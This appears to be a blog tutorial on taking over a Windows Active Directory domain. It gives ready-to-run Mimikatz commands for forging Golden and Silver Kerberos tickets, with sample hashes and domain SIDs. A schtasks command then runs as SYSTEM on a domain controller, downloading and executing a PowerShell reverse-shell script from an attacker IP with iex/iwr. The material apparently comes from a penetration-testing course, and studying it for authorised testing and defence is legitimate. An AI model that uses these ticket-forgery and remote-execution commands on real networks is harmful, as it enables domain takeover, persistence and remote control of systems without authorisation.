How to get a reverse shell from Golden/Silver Ticket without Metasploit?

4 min readJun 5, 2020

A few days ago, I was trying to get a reverse shell on a Windows 2016 Server after generating Golden/Silver ticket but due to some reason, I was not able to use PSRemoting. I started looking for alternatives and found that a lot of articles on command execution using a Golden/Silver Ticket used Metasploit which I didn’t have access to. So I thought of writing this article from the tricks I picked up from the Pentester Academy’s Attacking and Defending AD course.

Golden Ticket

Golden Ticket is a persistence mechanism, it is signed and encrypted with NTLM hash of krbtgt account. In simple words, Golden Ticket is a valid Ticket Granting Ticket(TGT) used to obtain access to different services. We can use the Golden Ticket to impersonate any user in the domain.

Once you get the NTLM hash of krbtgt account we can use the following Mimikatz command to get a Golden Ticket (We need to run this as a local admin as we will be writing to LSASS process):

Invoke-Mimikatz -Command ‘“kerberos::golden /User:Administrator /domain:somedomainname.local /sid:S-1–5–21–1874506631–3219951593–538509811 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt”’

kerberos::golden — Name of the Mimikatz Module

user — Name of the user for whom we are requesting the TGT (doesn’t need to be a valid name as account validation is not done by the DC until TGT is older than 20 mins)

domain — Name of the target domain

sid — Domain SID (You can use the command Get-DomainSID from PowerView to get this)

krbtgt — NTLM hash of the krbtgt account

id & group —User and Group RID(Optional parameter)

ptt — Inject the ticket into current PowerShell Session (we can use /ticket to save the ticket for later use)

startoffset — When will the ticket be available in minutes(0- right now)(Optional parameter)

endin — Lifetime of ticket in minutes(Optional parameter)

renewmax — Ticket lifetime with renewal in minutes (Optional parameter)

To check if the ticket was created, we can use the following command:

klist

Silver Ticket

A Silver Ticket on the other hand is a valid Ticket Granting Service(TGS) which is encrypted using the NTLM hash of a service account. Silver Ticket can only be used to access the service with who’s NTLM hash it is encrypted with. Silver Ticket attack is very quite in terms of the logs left behind but at the same time provides limited access.

Once we have the NTLM hash of a target service we can use the following command to request for Silver Ticket:

Invoke-Mimikatz -Command ‘“kerberos::golden /domain:somedomainname.local /sid:S-1–5–21–1874506631–3219951593–538509811 /target:dc.somedomainname.local /service:HOST /rc4:731a06658bc10b59d71f5776e93e5689 /user:Administrator /ptt”’

The Mimikatz module used here is still kerberos::golden, there is no silver module.

service — the SPN name of service for which we are requesting TGS

rc4 — NTLM hash of target service account

Note: We need a TGS for HOST service in order to schedule task on the target server(required to a get reverse shell from Silver Ticket).

Getting a Reverse Shell

Step 1: Schedule a weekly task to fetch reverse shell script.

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU “NT Authority\SYSTEM” /TN “ABC” /TR “powershell.exe -c ‘ iex (iwr http://172.16.100.14/Invoke-PowerShellTcp.ps1 -UseBasicParsing)’”

Note: Make sure you are calling the function within the script and have proper IP and port number configured (Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.14 -Port 1024). And the file is host :P

S — Name of the computer on which the task is to be scheduled

SC — Schedule type

RU — User used to create and execute the task

TN — Name of the task

TR — specify the command to run when the task is running